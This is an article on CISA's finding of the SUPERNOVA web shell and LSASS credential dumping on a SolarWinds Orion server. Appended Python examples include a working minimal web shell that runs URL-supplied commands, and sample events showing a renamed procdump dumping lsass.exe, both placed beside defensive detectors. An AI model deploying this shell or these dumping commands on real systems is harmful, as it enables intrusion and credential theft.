The Cybersecurity and Infrastructure Security Agency (CISA) has reported finding the SUPERNOVA web shell collecting credentials on a SolarWinds Orion server. The observations were made during an incident response to an Advanced Persistent Threat (APT) actor's year-long compromise of an enterprise network. In its analysis, CISA warns that the threat actor behind the compromise "targeted multiple entities in the same period".

The SUPERNOVA web shell is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to look like part of the SolarWinds Orion monitoring product. SUPERNOVA is therefore planted by lateral movement inside an already compromised network; it is not considered part of the SolarWinds supply chain attack, and the threat actors behind it are believed to be different from the ones behind that infamous attack.

## Pulse Secure VPN

CISA found that the attacker(s) had access to the enterprise's network for nearly a year, between March 2020 and February 2021. According to its investigation, the threat actor connected to the entity's network through a Pulse Secure Virtual Private Network (VPN) appliance. The attacker(s) authenticated to the VPN appliance with several user accounts that did not have multi-factor authentication (MFA) enabled, which let them masquerade as legitimate teleworking employees. CISA reports that it "does not know how the threat actor initially obtained these credentials", but, by coincidence, just two days ago we detailed multiple Pulse Secure vulnerabilities that are being actively exploited in the wild and that could be leveraged in such an attack.

From the VPN the attacker(s) moved laterally to the SolarWinds Orion server and established a backdoor there, so that they could persist and reconnect even if their initial point of entry was closed.

## Web shells

Web shells are usually small scripts that act as a backdoor or a first point of entry for an attacker. A shell like this sits on a compromised server and simply executes whatever command an attacker sends it via a web URL. A minimal web shell can be as simple as this:

The SUPERNOVA web shell is more sophisticated and written in .NET rather than PHP, but it is essentially no different. It is initially installed by a PowerShell script and hides in a malicious version of the SolarWinds Orion Web Application module. It enables remote injection of C# source code into a web portal provided by the SolarWinds software suite. The injected code is compiled and executed directly in memory.

## Credential dumping

The goal of the operation looks to have been to gather even more credentials. CISA reports that the threat actor was able to dump credentials from the SolarWinds appliance via two methods:

- by dumping Local Security Authority Subsystem Service (LSASS) memory;
- by recovering the cached credentials used by the SolarWinds appliance server for network monitoring.

The cached credentials are normally protected by encryption, and the private key of the certificate that protects them is normally not exportable. So either the threat actor was able to change or bypass that property, or the victim had mistakenly marked the certificate's private key as exportable; whether that key is exportable is a property of the key in the Windows certificate store and is worth verifying on Orion servers. To dump LSASS memory, the attacker put a renamed copy of procdump.exe on the SolarWinds Orion server, so a detection that only looks for a file called procdump.exe will miss it.
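The minimal web shell described in the web shells section above, as an added example written here in Python rather than PHP (this is not code from the original article, from SolarWinds or from SUPERNOVA), beside a detector that hunts for web-shell-style traffic in a constructed web-server log. The log format, the handler path, the command parameter names and the C# markers are assumptions made for the example; SUPERNOVA's own request layout is not on the page.

```python
"""Added example, not code from the original article or from SolarWinds:
the minimal web shell the text describes, written in Python instead of PHP,
beside a detector that hunts for web-shell traffic in a constructed log."""
import re
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def run_web_shell_command(query_string: str) -> str:
    """Core of a minimal web shell: run whatever 'cmd' the URL carries and
    hand the output back. Deliberately unsafe: this is the attacker's tool,
    shown only to make the detection below concrete."""
    cmd = parse_qs(query_string).get("cmd", [""])[0]
    if not cmd:
        return ""
    completed = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return completed.stdout + completed.stderr


class WebShellHandler(BaseHTTPRequestHandler):
    """GET /shell?cmd=whoami runs 'whoami' on the server and returns its output."""

    def do_GET(self):
        body = run_web_shell_command(urlsplit(self.path).query).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


# --- Detection side --------------------------------------------------------
# Parameter names plain web shells commonly use for the command (assumption).
SHELL_PARAMS = {"cmd", "command", "exec"}

# SUPERNOVA takes C# source code as request input, so a parameter value that
# looks like C# is a strong signal whatever the parameter is called.
CSHARP_SOURCE = re.compile(
    r"using\s+System\b|namespace\s+\w+\s*\{|class\s+\w+\s*\{|System\.Diagnostics\.Process"
)

# Constructed log lines: "timestamp client method url status". The handler
# path and client addresses are made up for the example.
SAMPLE_LOG = """\
2021-02-10T10:12:03Z 10.0.0.12 GET /Orion/Login.aspx 200
2021-02-10T10:12:09Z 10.0.0.12 GET /Orion/Images/logo.png 200
2021-02-10T10:13:41Z 203.0.113.7 GET /Orion/Example/Handler.ashx?cmd=whoami 200
2021-02-10T10:14:02Z 203.0.113.7 GET /Orion/Example/Handler.ashx?src=using%20System%3Bnamespace%20X%7Bclass%20Y%7B%7D%7D 200
2021-02-10T10:15:30Z 10.0.0.33 GET /Orion/NetPerfMon/Resources.aspx?NetObject=N%3A12 200
"""


def parse_log_line(line: str) -> dict:
    """Split one constructed log line; parse_qs percent-decodes the values."""
    timestamp, client, method, url, status = line.split()
    parts = urlsplit(url)
    return {"time": timestamp, "client": client, "method": method,
            "path": parts.path, "params": parse_qs(parts.query), "status": int(status)}


def web_shell_indicators(entry: dict) -> list[str]:
    """Return the reasons a request looks like web-shell traffic (empty if none)."""
    reasons = []
    for name, values in entry["params"].items():
        if name.lower() in SHELL_PARAMS:
            reasons.append(f"command parameter '{name}'")
        if any(CSHARP_SOURCE.search(v) for v in values):
            reasons.append(f"C# source in parameter '{name}'")
    return reasons


def scan_log(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, path, reasons) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_log_line(line)
        reasons = web_shell_indicators(entry)
        if reasons:
            hits.append((entry["client"], entry["path"], reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    # To run the shell itself on a lab box only:
    # HTTPServer(("127.0.0.1", 8080), WebShellHandler).serve_forever()
```

The detector deliberately keys on what the request carries rather than on a file name: a web shell hiding inside a legitimate-looking Orion module, as SUPERNOVA does, will not stand out by path, but a request whose parameter holds a shell command or a block of C# source will.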
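Detection logic for the credential-dumping step described above (a renamed procdump.exe reading LSASS memory), as an added example that is not code from the original article, CISA or SolarWinds. It runs over constructed Sysmon-style events; the field names follow Sysmon's ProcessCreate (event 1) and ProcessAccess (event 10) events, while the events themselves, the paths and the allowlist are made up for the example.

```python
"""Added example, not code from the original article, CISA or SolarWinds:
flag a renamed memory-dumping tool and non-allowlisted reads of LSASS memory
in constructed Sysmon-style events."""
import os

# Windows process access rights a memory dumper needs on lsass.exe.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_ACCESS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Sysmon records OriginalFileName from the PE version resource, which a rename
# on disk does not change. Stems compared case-insensitively (assumption).
DUMP_TOOLS = {"procdump", "procdump64"}

# Processes that legitimately open lsass.exe on a typical host (constructed
# allowlist; tune it to your own environment).
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

# Constructed events. Event 1 shows procdump renamed to svchost.exe and aimed
# at lsass.exe; event 2 is the matching LSASS memory read.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "procdump",
     "CommandLine": r"svchost.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Monitor\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe", "OriginalFileName": "procdump",
     "CommandLine": r"procdump.exe -accepteula -ma notepad.exe"},
]


def stem(path: str) -> str:
    """Lower-cased file name without directory or extension, for Windows paths."""
    return os.path.splitext(os.path.basename(path.replace("\\", "/")))[0].lower()


def check_process_create(event: dict) -> list[tuple[str, str]]:
    """Event 1: a dump tool running under another name, or aimed at LSASS."""
    findings = []
    image = event.get("Image", "")
    original = stem(event.get("OriginalFileName", ""))
    if original in DUMP_TOOLS and stem(image) != original:
        findings.append(("renamed-dump-tool", image))
    if original in DUMP_TOOLS and "lsass" in event.get("CommandLine", "").lower():
        findings.append(("lsass-dump-commandline", image))
    return findings


def check_process_access(event: dict) -> list[tuple[str, str]]:
    """Event 10: a non-allowlisted process holding read access to LSASS memory."""
    source = event.get("SourceImage", "")
    if stem(event.get("TargetImage", "")) != "lsass":
        return []
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if (granted & DUMP_ACCESS) == DUMP_ACCESS and source.lower() not in LSASS_ALLOWLIST:
        return [("lsass-memory-read", source)]
    return []


def analyze(events: list[dict]) -> list[tuple[str, str]]:
    """Run both checks over a stream of events and collect (rule, image) findings."""
    findings = []
    for event in events:
        if event.get("EventID") == 1:
            findings.extend(check_process_create(event))
        elif event.get("EventID") == 10:
            findings.extend(check_process_access(event))
    return findings


if __name__ == "__main__":
    for rule, image in analyze(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The two checks are complementary: the rename is caught by comparing the on-disk name with the name in the PE version resource, and the dump itself is caught by the access mask on lsass.exe, which does not depend on which tool asked for it. An unrenamed procdump dumping some other process (the last sample event) produces no finding.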